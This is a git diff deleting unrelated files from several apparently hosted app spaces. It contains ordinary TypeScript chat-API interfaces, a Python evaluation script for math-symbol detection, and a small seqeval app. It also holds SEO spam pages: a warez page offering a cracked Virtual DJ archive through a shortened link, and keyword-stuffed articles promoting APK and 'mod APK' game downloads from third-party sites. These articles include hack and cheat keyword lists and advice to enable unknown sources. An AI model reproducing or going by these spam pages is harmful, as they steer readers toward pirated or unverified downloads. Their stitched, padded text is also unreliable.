throttling?: Throttling - } - } - | { - type: 'DONE' - } - | { - type: 'ERROR' - error: ChatError - } - -export interface SendMessageParams { - prompt: string - imageUrl?: string - options: T - onEvent: (event: Event) => void - signal?: AbortSignal -} - -export interface ConversationResponse { - conversationId: string - clientId: string - conversationSignature: string - result: { - value: string - message?: string - } -} - -export interface Telemetry { - metrics?: null - startTime: string -} - -export interface ChatUpdateArgument { - messages?: ChatResponseMessage[] - throttling?: Throttling - requestId: string - result: null -} - -export type ChatUpdateCompleteResponse = { - type: 2 - invocationId: string - item: ChatResponseItem -} | { - type: 1 - target: string - arguments: ChatUpdateArgument[] -} | { - type: 3 - invocationId: string -} | { - type: 6 | 7 -} - -export interface ChatRequestResult { - value: string - serviceVersion: string - error?: string -} - -export interface ChatResponseItem { - messages: ChatResponseMessage[] - firstNewMessageIndex: number - suggestedResponses: null - conversationId: string - requestId: string - conversationExpiryTime: string - telemetry: Telemetry - result: ChatRequestResult - throttling: Throttling -} -export enum InvocationEventType { - Invocation = 1, - StreamItem = 2, - Completion = 3, - StreamInvocation = 4, - CancelInvocation = 5, - Ping = 6, - Close = 7, -} - -// https://github.com/bytemate/bingchat-api/blob/main/src/lib.ts - -export interface ConversationInfo { - conversationId: string - clientId: string - conversationSignature: string - invocationId: number - conversationStyle: BingConversationStyle - prompt: string - imageUrl?: string -} - -export interface BingChatResponse { - conversationSignature: string - conversationId: string - clientId: string - invocationId: number - conversationExpiryTime: Date - response: string - details: ChatResponseMessage -} - -export interface Throttling { - maxNumLongDocSummaryUserMessagesInConversation: number - maxNumUserMessagesInConversation: number - numLongDocSummaryUserMessagesInConversation: number - numUserMessagesInConversation: number -} - -export interface ChatResponseMessage { - text: string - spokenText?: string - author: string - createdAt: Date - timestamp: Date - messageId: string - requestId: string - offense: string - adaptiveCards: AdaptiveCard[] - sourceAttributions: SourceAttribution[] - feedback: Feedback - contentOrigin: string - messageType?: string - contentType?: string - privacy: null - suggestedResponses: SuggestedResponse[] -} - -export interface AdaptiveCard { - type: string - version: string - body: Body[] -} - -export interface Body { - type: string - text: string - wrap: boolean - size?: string -} - -export interface Feedback { - tag: null - updatedOn: null - type: string -} - -export interface SourceAttribution { - providerDisplayName: string - seeMoreUrl: string - searchQuery: string -} - -export interface SuggestedResponse { - text: string - author?: Author - createdAt?: Date - timestamp?: Date - messageId?: string - messageType?: string - offense?: string - feedback?: Feedback - contentOrigin?: string - privacy?: null -} - -export interface KBlobRequest { - knowledgeRequest: KnowledgeRequestContext - imageBase64?: string -} - -export interface KBlobResponse { - blobId: string - processedBlobId?: string -} - -export interface KnowledgeRequestContext { - imageInfo: ImageInfo; - knowledgeRequest: KnowledgeRequest; -} - -export interface ImageInfo { - url?: string; -} - -export interface KnowledgeRequest { - invokedSkills: string[]; - subscriptionId: string; - invokedSkillsRequestData: InvokedSkillsRequestData; - convoData: ConvoData; -} - -export interface ConvoData { - convoid: string; - convotone: BingConversationStyle; -} - -export interface InvokedSkillsRequestData { - enableFaceBlur: boolean; -} - -export interface FileItem { - url: string; - status?: 'loading' | 'error' | 'loaded' -} diff --git a/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py b/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py deleted file mode 100644 index c161a87b849eb94f1e39da704ba22f1dadaa879d..0000000000000000000000000000000000000000 --- a/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py +++ /dev/null @@ -1,353 +0,0 @@ -# Author: Parag Mali -# This file contains functions that calculate character level detection results - -import os -import sys -sys.path.extend(['/home/psm2208/code', '/home/psm2208/code']) - -import csv -from multiprocessing import Pool -from IOU_lib import IOUevaluater -import copy -from gtdb import box_utils - -# check if two rectangles intersect -def intersects(first, other): - return not (first[2] < other[0] or - first[0] > other[2] or - first[1] > other[3] or - first[3] < other[1]) - -def read_data(training_pdf_names, char_dir, gt_math_dir, det_math_dir): - - char_bbs = {} - args = [] - total_math_char = 0 - - for filename in training_pdf_names: - - path = os.path.join(char_dir, filename + ".csv") - print('Processing ' + path) - count = 0 - - #data = adjust_data[filename] - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - #print('row is ' + str(row[1])) - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - if row[6] == 'MATH_SYMBOL': - total_math_char = total_math_char + 1 - - # row[2] = data[count][1] - # row[3] = data[count][2] - # row[4] = data[count][3] - # row[5] = data[count][4] - - map[str(int(float(row[0])))].append(row) - count = count + 1 - - char_bbs[filename] = map - - det_math_bbs = {} - - for filename in training_pdf_names: - - #path = os.path.join(math_dir, filename + ".math") - path = os.path.join(det_math_dir, filename + ".csv") - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - - map[str(int(float(row[0])))].append(row) - - det_math_bbs[filename] = map - - gt_math_bbs = {} - - for filename in training_pdf_names: - - path = os.path.join(gt_math_dir, filename + ".csv") - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - map[str(int(float(row[0])))].append(row) - - gt_math_bbs[filename] = map - - return training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs - - -def char_level_eval(training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs): - - args = [] - - for key in det_math_bbs: - for page in det_math_bbs[key]: - if page not in gt_math_bbs[key]: - gt_math = [] - else: - gt_math = gt_math_bbs[key][page] - args.append([key, det_math_bbs[key][page], char_bbs[key][page], gt_math]) - - pool = Pool(processes=16) - ans = pool.map(character_level_score, args) - pool.close() - pool.join() - - detected_math_char = 0 - detected_text_char = 0 - - for math, text in ans: - detected_math_char = detected_math_char + math - detected_text_char = detected_text_char + text - - print('detected math chars ', detected_math_char) - print('detected text chars ', detected_text_char) - print('total math chars ', total_math_char) - - recall = detected_math_char / total_math_char - precision = detected_math_char / (detected_math_char + detected_text_char) - - fscore = 2 * recall * precision / (recall + precision) - - print('Char Recall\t', recall) - print('Char Precision\t', precision) - print('Char F-Score\t', fscore) - - -def character_level_score(args): - - filename, det_math_bbs, char_bbs, gt_math_bbs = args - detected_math_char_count = 0 - text_char_count = 0 - - for char_info in char_bbs: - char_bb = [float(char_info[1]), float(char_info[2]), float(char_info[3]), float(char_info[4])] - - for current_math_bb in det_math_bbs: - - math_bb = [float(current_math_bb[1]),float(current_math_bb[2]), - float(current_math_bb[3]),float(current_math_bb[4])] - - if box_utils.check_inside(char_bb, math_bb): #TODO - - if char_info[6] == 'MATH_SYMBOL': - detected_math_char_count = detected_math_char_count + 1 - break - else: - text_char_count = text_char_count + 1 - - return detected_math_char_count, text_char_count - -def box_level_granular_eval(training_pdf_names, total_math_char, gt_math_dir, det_math_dir, - gt_math_bbs, det_math_bbs, char_bbs, test_gt_math_dir): - - _, _, detailed_detections = IOUevaluater.IOUeval(test_gt_math_dir, det_math_dir) - assign_chars_to_math_boxes(gt_math_bbs, char_bbs) - assign_chars_to_math_boxes(det_math_bbs, char_bbs) - - single_char_det = [0, 0] - multi_char_det = [0, 0] - - total_single_char_det = 0 - total_multi_char_det = 0 - - single_char_gt = 0 - multi_char_gt = 0 - - for filename in training_pdf_names: - current_det = detailed_detections[filename] - - for page in current_det[0]: - coarse = current_det[0][page] - fine = current_det[1][page] - - #DET for recall - for det in coarse: - if gt_math_bbs[filename][str(int(float(page)))][int(det[3:])-1][5] > 1: - multi_char_det[0] = multi_char_det[0] + 1 - else: - single_char_det[0] = single_char_det[0] + 1 - - for det in fine: - if gt_math_bbs[filename][str(int(float(page)))][int(det[3:])-1][5] > 1: - multi_char_det[1] = multi_char_det[1] + 1 - else: - single_char_det[1] = single_char_det[1] + 1 - - # DET for precision - for det in det_math_bbs[filename][str(int(float(page)))]: - if det[5] > 1: - total_multi_char_det = total_multi_char_det + 1 - else: - total_single_char_det = total_single_char_det + 1 - - #TODO - # for gt in gt_math_bbs[filename][str(int(float(page)))]: - # if gt[5] == 1: - # single_char_gt = single_char_gt + 1 - # else: - # multi_char_gt = multi_char_gt + 1 - - # GT - for page in gt_math_bbs[filename]: - for gt in gt_math_bbs[filename][str(int(float(page)))]: - if gt[5] > 1: - multi_char_gt = multi_char_gt + 1 - else: - single_char_gt = single_char_gt + 1 - - # single char scores - coarse - # precision - print("Number of single character regions correctly detected IOU50, IOU75 ", single_char_det) - print("Total number of single character regions detected ", total_single_char_det) - print("Total number of single character regions GT ", single_char_gt) - - print("Number of multi character regions correctly detected IOU50, IOU75 ", multi_char_det) - print("Total number of multi character regions detected ", total_multi_char_det) - print("Total number of multi character regions GT ", multi_char_gt) - - # Single character regions - - print("***** Results : Single Character Regions ***** ") - prec_50 = single_char_det[0]/total_single_char_det - rec_50 = single_char_det[0] / single_char_gt - fscore_50 = 2*prec_50*rec_50/(prec_50 + rec_50) - - print("Precision IOU50 ", prec_50) - print("Recall IOU50 ", rec_50) - print("F-score IOU50 ", fscore_50) - - prec_75 = single_char_det[1] / total_single_char_det - rec_75 = single_char_det[1] / single_char_gt - fscore_75 = 2 * prec_75 * rec_75 / (prec_75 + rec_75) - - print("Precision IOU75 ", prec_75) - print("Recall IOU75 ", rec_75) - print("F-score IOU75 ", fscore_75) - - print("***** Results : Multi Character Regions ***** ") - prec_50 = multi_char_det[0] / total_multi_char_det - rec_50 = multi_char_det[0] / multi_char_gt - fscore_50 = 2 * prec_50 * rec_50 / (prec_50 + rec_50) - - print("Precision IOU50 ", prec_50) - print("Recall IOU50 ", rec_50) - print("F-score IOU50 ", fscore_50) - - prec_75 = multi_char_det[1] / total_multi_char_det - rec_75 = multi_char_det[1] / multi_char_gt - fscore_75 = 2 * prec_75 * rec_75 / (prec_75 + rec_75) - - print("Precision IOU75 ", prec_75) - print("Recall IOU75 ", rec_75) - print("F-score IOU75 ", fscore_75) - -def find_merged_regions(training_pdf_names, gt_math_boxes, det_math_boxes): - - det_regions_with_multi_math = 0 - - for pdf_name in training_pdf_names: - for page in det_math_boxes[pdf_name]: - - for det in det_math_boxes[pdf_name][page]: - - count = 0 - - det_bb = [float(det[1]), float(det[2]), - float(det[3]), float(det[4])] - - if page not in gt_math_boxes[pdf_name]: - continue - - for gt in gt_math_boxes[pdf_name][page]: - - gt_bb = [float(gt[1]),float(gt[2]), - float(gt[3]),float(gt[4])] - - if box_utils.check_inside(gt_bb, det_bb): - count = count + 1 - - if count > 1: - det_regions_with_multi_math = \ - det_regions_with_multi_math + count - break - - print("Merged boxes ", det_regions_with_multi_math) - - -def assign_chars_to_math_boxes(all_math_boxes, all_char_bbs): - - for pdf_name in all_math_boxes: - for page in all_math_boxes[pdf_name]: - - #print('Assigning ', pdf_name, page) - math_boxes = all_math_boxes[pdf_name][page] - char_bbs = all_char_bbs[pdf_name][str(int(float(page)))] - - for math_box in math_boxes: - math_box.append(0) - - for char_info in char_bbs: - for math_bb in math_boxes: - - current_char_bb = [float(char_info[1]), float(char_info[2]), #TODO index from 1 - float(char_info[3]), float(char_info[4])] - - current_math_bb = [float(math_bb[1]),float(math_bb[2]), - float(math_bb[3]),float(math_bb[4])] - - if box_utils.check_inside(current_char_bb, current_math_bb): - math_bb[-1] = math_bb[-1] + 1 - - -if __name__ == '__main__': - - training_pdf_names = open(sys.argv[1], 'r') - - training_pdf_names_list = [] - - # for each training image pdf file - for pdf_name in training_pdf_names: - pdf_name = pdf_name.strip() - if pdf_name != '': - training_pdf_names_list.append(pdf_name) - training_pdf_names.close() - - detected_math_dir = sys.argv[2] #'/home/psm2208/code/eval/final_submission/Test/' - gt_math_dir = sys.argv[3] # '/home/psm2208/data/GTDB/annotations/' - - gt_char_dir = sys.argv[4]#'/home/psm2208/data/GTDB/char_annotations/' - test_gt_math_dir = sys.argv[5] #/home/psm2208/Workspace/Task3_Detection/Test/test_math/ - - image_dir = '/home/psm2208/data/GTDB/images/' - - training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs = \ - read_data(training_pdf_names_list, gt_char_dir, gt_math_dir, detected_math_dir) - - char_level_eval(training_pdf_names, total_math_char, copy.deepcopy(gt_math_bbs), - copy.deepcopy(det_math_bbs), copy.deepcopy(char_bbs)) - - box_level_granular_eval(training_pdf_names, total_math_char, gt_math_dir, - detected_math_dir, gt_math_bbs, - det_math_bbs, char_bbs,test_gt_math_dir) - - find_merged_regions(training_pdf_names, copy.deepcopy(gt_math_bbs), copy.deepcopy(det_math_bbs)) diff --git a/spaces/evaluate-metric/seqeval/app.py b/spaces/evaluate-metric/seqeval/app.py deleted file mode 100644 index 7c05d59ec96e2789c3850ce0d656b932564d34af..0000000000000000000000000000000000000000 --- a/spaces/evaluate-metric/seqeval/app.py +++ /dev/null @@ -1,11 +0,0 @@ -import sys - -import evaluate -from evaluate.utils import launch_gradio_widget - - -sys.path = [p for p in sys.path if p != "/home/user/app"] -module = evaluate.load("seqeval") -sys.path = ["/home/user/app"] + sys.path - -launch_gradio_widget(module) diff --git a/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md b/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md deleted file mode 100644 index 55d1d50b526090aacc3eae529c65b14adc8231c4..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Ns Virtual Dj 6.0 Full By New Star.rar [PORTABLE].md +++ /dev/null @@ -1,6 +0,0 @@ -

    ns virtual dj 6.0 full by new star.rar


    Download Zip ————— https://urlca.com/2uDckH



    -
    -Star.Soccer.2010.RIP-Unleashed.rar. 01 star wars episode iv a new hope anh (305.30 ... ns virtual dj 6 0 full by new star (210.81 MB) download 1fdad05405
    -
    -
    -

    diff --git a/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md b/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md deleted file mode 100644 index 0c624b46677b85116478ebbebaf3da094eeb8f80..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Become the Worlds Best Cricket Manager with Cricket Manager Pro 2023.md +++ /dev/null @@ -1,106 +0,0 @@ -
    -

    Cricket Manager Pro 2023 APK: A Review

    -

    If you are a cricket fan and love to play cricket games on your Android device, you might have heard of Cricket Manager Pro 2023 APK. This is a new and exciting game that lets you build your own cricket club from scratch and compete with other cricket managers around the world. In this article, we will review this game and tell you everything you need to know about it.

    -

    Introduction

    -

    Cricket Manager Pro 2023 APK is a sports simulation game developed by Wicket Gaming, a company that specializes in creating realistic and immersive cricket games. The game was released in March 2023 and has already gained a lot of popularity among cricket fans. The game has over 500,000 downloads on Google Play Store and has received positive reviews from users and critics alike.

    -

    cricket manager pro 2023 apk


    Download Zip ✺✺✺ https://urllie.com/2uNHHk



    -

    The game allows you to create your own cricket club from scratch and control every aspect of your team. You can name your club, design your jersey and emblem, scout and sign players, train them, manage their tactics and formations, expand your stadium and facilities, and lead them to glory in various leagues and cups. You can also challenge other cricket managers from around the world in daily matches and climb up the global leaderboard.

    -

    The game features realistic graphics, animations, sounds, and physics that make you feel like you are watching a real cricket match. The game also has in-depth statistics and data that help you analyze your performance and improve your strategy. The game is constantly updated with new features, content, and events that keep you engaged and entertained.

    -

    How to Download and Install Cricket Manager Pro 2023 APK

    -

    If you want to play Cricket Manager Pro 2023 APK on your Android device, you will need to download and install the APK file from a reliable source. Here are the steps to do so:

    -
      -
    1. Go to [1](https://apkcombo.com/cricket-manager-pro-2023/com.wicketgaming.cricketmanager/) or [2](https://apkcombo.com/cricket-manager-pro-2023/com.wicketgaming.cricketmanager/download/apk) or [3](https://play.google.com/store/apps/details?id=com.wicketgaming.cricketmanager) and click on the download button to get the APK file.
    2. -
    3. Once the download is complete, locate the file on your device and tap on it to start the installation process.
    4. -
    5. You may need to enable unknown sources in your device settings to allow the installation of apps from outside the Google Play Store.
    6. -
    7. Follow the instructions on the screen to complete the installation.
    8. -
    9. Launch the game and enjoy!
    10. -
    -

    The game requires Android 4.4 or higher to run smoothly. It also requires access to your storage, network, location, phone, camera, microphone, contacts, calendar, and other permissions for various functions. You can review and manage these permissions in your device settings.

    -

    How to Play Cricket Manager Pro 2023 APK

    -

    Playing Cricket Manager Pro 2023 APK is easy and fun. Here are some tips on how to play the game:

    -

    How to create your own cricket club from scratch?

    When you start the game, you will be asked to choose a country and a city for your club. You can also customize your club name, jersey color, and emblem. You will then be given a budget and a squad of players to start with. You can use the budget to buy new players or upgrade your facilities. You can also sell or release players to free up some funds.

    -

    cricket manager pro 2023 game download
    -cricket manager pro 2023 mod apk
    -cricket manager pro 2023 android
    -cricket manager pro 2023 latest version
    -cricket manager pro 2023 free download
    -cricket manager pro 2023 tips and tricks
    -cricket manager pro 2023 review
    -cricket manager pro 2023 cheats
    -cricket manager pro 2023 hack
    -cricket manager pro 2023 online
    -cricket manager pro 2023 pc
    -cricket manager pro 2023 ios
    -cricket manager pro 2023 update
    -cricket manager pro 2023 features
    -cricket manager pro 2023 gameplay
    -cricket manager pro 2023 best players
    -cricket manager pro 2023 strategy
    -cricket manager pro 2023 guide
    -cricket manager pro 2023 forum
    -cricket manager pro 2023 reddit
    -cricket manager pro 2023 wiki
    -cricket manager pro 2023 support
    -cricket manager pro 2023 facebook
    -cricket manager pro 2023 instagram
    -cricket manager pro 2023 youtube
    -cricket manager pro 2023 twitter
    -cricket manager pro 2023 wicket gaming
    -cricket manager pro 2023 cm23 apk
    -cricket manager pro 2023 apkcombo
    -cricket manager pro 2023 google play
    -cricket manager pro 2023 apk download
    -cricket manager pro 2023 apk mirror
    -cricket manager pro 2023 apk pure
    -cricket manager pro 2023 apk file
    -cricket manager pro 2023 apk modded
    -cricket manager pro 2023 apk cracked
    -cricket manager pro 2023 apk unlimited money
    -cricket manager pro 2023 apk obb data
    -cricket manager pro 2023 apk for android tv
    -cricket manager pro 2023 apk for tablet
    -cricket manager pro 2023 apk for pc windows
    -cricket manager pro 2023 apk for mac os x
    -cricket manager pro 2023 apk for linux ubuntu
    -cricket manager pro 2023 apk for chrome os
    -cricket manager pro 2023 apk for fire tv stick
    -cricket manager pro 2023 apk for nvidia shield tv
    -cricket manager pro 2023 apk for roku tv
    -cricket manager pro 2023 apk for samsung smart tv
    -cricket manager pro 2023 apk for lg smart tv

    -

    How to train your team and improve their skills?

    -

    Training is an essential part of the game, as it helps you improve your team's performance and morale. You can access the training menu from the main screen and choose from various drills and exercises for your players. You can also assign individual training plans for each player based on their strengths and weaknesses. Training consumes energy and time, so you need to balance it with rest and recovery.

    -

    How to manage transfers, squad selection and formations?

    -

    Transfers are another important aspect of the game, as they allow you to buy or sell players from other clubs. You can access the transfer market from the main screen and browse through the available players. You can also search for specific players by name, position, rating, or price. You can bid for players or accept offers from other clubs. You need to negotiate the transfer fee, salary, contract length, and bonuses with the player and his agent.

    -

    Squad selection and formation are crucial for your team's success on the pitch. You can access the squad menu from the main screen and choose your starting eleven and substitutes. You can also change your formation, tactics, and roles for each player. You need to consider your opponent's style, your team's chemistry, and your players' fitness and morale when making these decisions.

    -

    How to control your finances and expand your franchise?

    -

    Finances are another key factor in the game, as they affect your ability to buy new players, upgrade your facilities, and pay your staff. You can access the finance menu from the main screen and check your income and expenses. You can also see your balance sheet, cash flow, profit and loss statement, and financial projections. You need to manage your finances wisely and avoid overspending or going into debt.

    -

    Expanding your franchise is a way to increase your fan base, revenue, and reputation. You can access the franchise menu from the main screen and choose from various options to grow your club. You can upgrade your stadium capacity, build new facilities, hire new staff, launch new merchandise, sponsor events, or create media campaigns. Each option has a cost and a benefit that you need to weigh carefully.

    -

    How to compete with other cricket managers around the world?

    -

    Competing with other cricket managers is the most fun and challenging part of the game. You can access the competition menu from the main screen and choose from various leagues and cups to participate in. You can also see your current ranking, fixtures, results, stats, and awards. You need to win matches and trophies to climb up the leaderboard and earn rewards.

    -

    You can also challenge other cricket managers in daily matches that are randomly generated based on your level and region. You can chat with them, send them gifts, or taunt them before or after the match. You can also join or create a club with other managers and cooperate or compete with them in club events.

    -

    Pros and Cons of Cricket Manager Pro 2023 APK

    -

    Cricket Manager Pro 2023 APK is a great game for cricket fans who want to experience the thrill of managing their own cricket club. However, like any game, it has its pros and cons that you should be aware of before playing it. Here are some of them:

    - - - - - - - -
    ProsCons
    - Realistic graphics, animations, sounds, and physics- Requires a lot of storage space and data usage
    - In-depth statistics and data- May drain your battery quickly
    - Constant updates with new features, content, and events- May contain some bugs or glitches
    - Engaging gameplay with various options and challenges- May be addictive or time-consuming
    - Social interaction with other cricket managers- May involve some in-app purchases or ads
    -

    Conclusion

    -

    Cricket Manager Pro 2023 APK is a game that lets you create your own cricket club from scratch and compete with other cricket managers around the world. It has realistic graphics, animations, sounds, and physics that make you feel like you are watching a real cricket match. It also has in-depth statistics and data that help you analyze your performance and improve your strategy. It also has constant updates with new features, content, and events that keep you engaged and entertained. It also has engaging gameplay with various options and challenges that test your skills and creativity. It also has social interaction with other cricket managers that adds to the fun and excitement. However, the game also has some drawbacks that you should be aware of before playing it. It requires a lot of storage space and data usage, which may affect your device's performance and speed. It may also drain your battery quickly, which may limit your playing time. It may also contain some bugs or glitches that may affect your gameplay or cause errors. It may also be addictive or time-consuming, which may interfere with your other responsibilities or activities. It may also involve some in-app purchases or ads that may annoy you or tempt you to spend money. Overall, Cricket Manager Pro 2023 APK is a game that we recommend for cricket fans who want to experience the thrill of managing their own cricket club. It has many pros that outweigh its cons, and it is a game that you will enjoy playing for a long time. However, you should also be mindful of the potential issues that may arise from playing it, and play it responsibly and moderately.

    FAQs

    -

    Here are some common questions and answers about the game:

    -

    Q: How can I get more coins and gems in the game?

    -

    A: Coins and gems are the main currencies in the game that you can use to buy new players, upgrade your facilities, or access premium features. You can earn coins and gems by winning matches, completing achievements, participating in events, or watching ads. You can also buy coins and gems with real money through in-app purchases.

    -

    Q: How can I change my club name, jersey color, or emblem?

    -

    A: You can change your club name, jersey color, or emblem by going to the club menu and tapping on the edit button. You can choose from various options or create your own custom design. However, you can only change these once every 30 days, so make sure you are happy with your choice before confirming it.

    -

    Q: How can I join or create a club with other managers?

    -

    A: You can join or create a club with other managers by going to the club menu and tapping on the club button. You can browse through the existing clubs or create your own club by choosing a name, logo, description, and settings. You can invite other managers to join your club or accept requests from others. You can also chat with your club members, send them gifts, or compete with them in club events.

    -

    Q: How can I contact the support team or report a problem?

    -

    A: You can contact the support team or report a problem by going to the settings menu and tapping on the help button. You can choose from various topics or categories that relate to your issue or question. You can also send an email to support@wicketgaming.com or visit their website at [4](https://www.wicketgaming.com/).

    -

    Q: How can I update the game or check for new features?

    -

    A: You can update the game or check for new features by going to the Google Play Store and searching for Cricket Manager Pro 2023 APK. You can see if there is a new version available and download it if there is. You can also enable automatic updates in your device settings to get the latest version automatically. You can also follow their social media accounts at [5](https://www.facebook.com/wicketgaming/) or [6](https://twitter.com/wicketgaming) to get updates and news about the game.

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md b/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md deleted file mode 100644 index 832ff14b6507e5048dd299e3ca6d803faa493c7a..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/DLS 19 MOD v6.13 - The Best Dream League Soccer 2019 MOD APK for Indonesia.md +++ /dev/null @@ -1,131 +0,0 @@ - -

    Download Mod APK Dream League Soccer 2019 Indonesia

    -

    If you are a fan of soccer games and want to enjoy a realistic and immersive experience on your Android device, you might want to try Dream League Soccer 2019. This game is one of the most popular and highly rated soccer games on the Google Play Store, with over 100 million downloads and 4.5 stars. But what if you want to unlock more features, customize your team, and get unlimited resources in the game? That's where Mod APK comes in. In this article, we will tell you what is Dream League Soccer 2019, what is Mod APK, and how to download Mod APK Dream League Soccer 2019 Indonesia.

    -

    What is Dream League Soccer 2019?

    -

    Dream League Soccer 2019 is a sports game developed by First Touch Games Ltd. It is the latest version of the Dream League Soccer series, which started in 2016. In this game, you can create and manage your own dream team from over 3,500 FIFPro™ licensed players and compete in various leagues and tournaments. You can also design your own stadium, kits, and logos, and enjoy realistic graphics, animations, and gameplay at 60 frames per second.

    -

    download mod apk dream league soccer 2019 indonesia


    Download File ☆☆☆ https://urllie.com/2uNxEn



    -

    Features of Dream League Soccer 2019

    -

    Some of the features that make Dream League Soccer 2019 stand out from other soccer games are:

    -
      -
    • You can sign top superstar players such as Gareth Bale, Lionel Messi, Cristiano Ronaldo, and more to create your own dream team.
    • -
    • You can choose your formation, style, and tactics to suit your preferences and strategies.
    • -
    • You can rise through six divisions and seven cup competitions to reach the prestigious Elite Division and become the champion.
    • -
    • You can participate in regular live events to win prizes and glory.
    • -
    • You can enjoy exclusive soundtracks by Sunset Sons, The Luka State, Vistas, and more.
    • -
    -

    How to play Dream League Soccer 2019

    -

    To play Dream League Soccer 2019 on your Android device, you need to download it from the Google Play Store or from the official website. The game is free to download and play, but it contains in-app purchases that can enhance your gaming experience. You also need an internet connection to play online modes and access some features.

    -

    Once you have installed the game, you can start by creating your own team name, logo, and kit. You can also choose a captain from the available players. Then, you can enter the Dream League mode, where you can compete against other teams in different divisions. You can also play in the Cup mode, where you can face off against teams from different countries in knockout rounds. You can also join or create a club in the Online mode, where you can challenge other players from around the world.

    -

    To control your players on the field, you can use the virtual joystick on the left side of the screen to move them around. You can also use the buttons on the right side of the screen to pass, shoot, tackle, sprint, or switch players. You can also customize your controls in the settings menu.

    -

    What is Mod APK?

    -

    Mod APK is a modified version of an original APK (Android Package Kit) file that has been altered by third-party developers or hackers to add or remove some features from the original app. Mod APKs are usually created for popular games or apps that have limitations or restrictions that prevent users from enjoying them fully.[^4^

    Benefits of Mod APK

    -

    Some of the benefits that Mod APK can offer to users are:

    -

    download mod apk dls 19 indonesia
    -download dream league soccer 2019 mod apk + obb
    -download dls 19 mod apk unlimited money
    -download dream league soccer 2019 mod apk latest version
    -download dls 19 mod apk timnas indonesia
    -download dream league soccer 2019 mod apk offline
    -download dls 19 mod apk all players unlocked
    -download dream league soccer 2019 mod apk android 1
    -download dls 19 mod apk unlimited coins and gems
    -download dream league soccer 2019 mod apk revdl
    -download dls 19 mod apk real madrid
    -download dream league soccer 2019 mod apk hack
    -download dls 19 mod apk barcelona
    -download dream league soccer 2019 mod apk rexdl
    -download dls 19 mod apk juventus
    -download dream league soccer 2019 mod apk data file host
    -download dls 19 mod apk liverpool
    -download dream league soccer 2019 mod apk mega
    -download dls 19 mod apk manchester united
    -download dream league soccer 2019 mod apk mediafıre
    -download dls 19 mod apk psg
    -download dream league soccer 2019 mod apk no root
    -download dls 19 mod apk chelsea
    -download dream league soccer 2019 mod apk unlimited everything
    -download dls 19 mod apk arsenal
    -download dream league soccer 2019 mod apk and data
    -download dls 19 mod apk bayern munich
    -download dream league soccer 2019 mod apk pure
    -download dls 19 mod apk inter milan
    -download dream league soccer 2019 mod apk for pc
    -download dls 19 mod apk atletico madrid
    -download dream league soccer 2019 mod apk free shopping
    -download dls 19 mod apk ac milan
    -download dream league soccer 2019 mod apk full unlocked
    -download dls 19 mod apk borussia dortmund
    -download dream league soccer 2019 mod apk vip unlocked
    -download dls 19 mod apk leicester city
    -download dream league soccer 2019 mod apk low mb
    -download dls 19 mod apk napoli
    -download dream league soccer 2019 mod apk new update
    -download dls 19 mod apk tottenham hotspur
    -download dream league soccer 2019 mod apk original logo and kits offline hd graphics unlimited coins and money full transfers unlocked players online offline latest version android game free direct mediafire link no ads no survey no verification no password no human verification no root required install play enjoy have fun","snippets":["download dls"],"url":"[3](https://www.dreamleaguesoccermodapk.com/2022/03/download-dream-league-soccer-mod-apk.html)"}]}

    -
      -
    • You can access premium features or content that are otherwise locked or unavailable in the original app.
    • -
    • You can get unlimited resources such as coins, gems, money, or energy that can help you progress faster or buy more items in the game.
    • -
    • You can customize your game settings, graphics, interface, or gameplay according to your preferences.
    • -
    • You can bypass ads, verification, or registration processes that can be annoying or time-consuming.
    • -
    • You can enjoy new or exclusive features that are not present in the original app.
    • -
    -

    Risks of Mod APK

    -

    However, Mod APK also comes with some risks that users should be aware of before downloading or installing them. Some of the risks are:

    -
      -
    • You can violate the terms and conditions of the original app developer or publisher, which can result in legal actions or account bans.
    • -
    • You can expose your device to malware, viruses, spyware, or other harmful software that can damage your device or steal your personal information.
    • -
    • You can lose your progress, data, or files if the Mod APK is incompatible, unstable, or corrupted.
    • -
    • You can experience bugs, glitches, errors, or crashes that can affect your game performance or enjoyment.
    • -
    • You can miss out on updates, patches, or new features that are released by the original app developer or publisher.
    • -
    -

    How to download Mod APK Dream League Soccer 2019 Indonesia

    -

    If you want to download Mod APK Dream League Soccer 2019 Indonesia, you need to follow some steps and requirements. Here are some of them:

    -

    Requirements for downloading Mod APK Dream League Soccer 2019 Indonesia

    -

    Before you download Mod APK Dream League Soccer 2019 Indonesia, you need to make sure that you have the following requirements:

    -
      -
    • An Android device that runs on Android 4.4 or higher.
    • -
    • Enough storage space on your device or SD card to accommodate the Mod APK file and the OBB data file.
    • -
    • A reliable internet connection to download the files and play online modes.
    • -
    • A file manager app that can extract ZIP or RAR files and move them to the appropriate folders.
    • -
    • A backup of your original Dream League Soccer 2019 app and data in case something goes wrong.
    • -
    -

    Steps for downloading Mod APK Dream League Soccer 2019 Indonesia

    -

    After you have met the requirements, you can follow these steps to download Mod APK Dream League Soccer 2019 Indonesia:

    -
      -
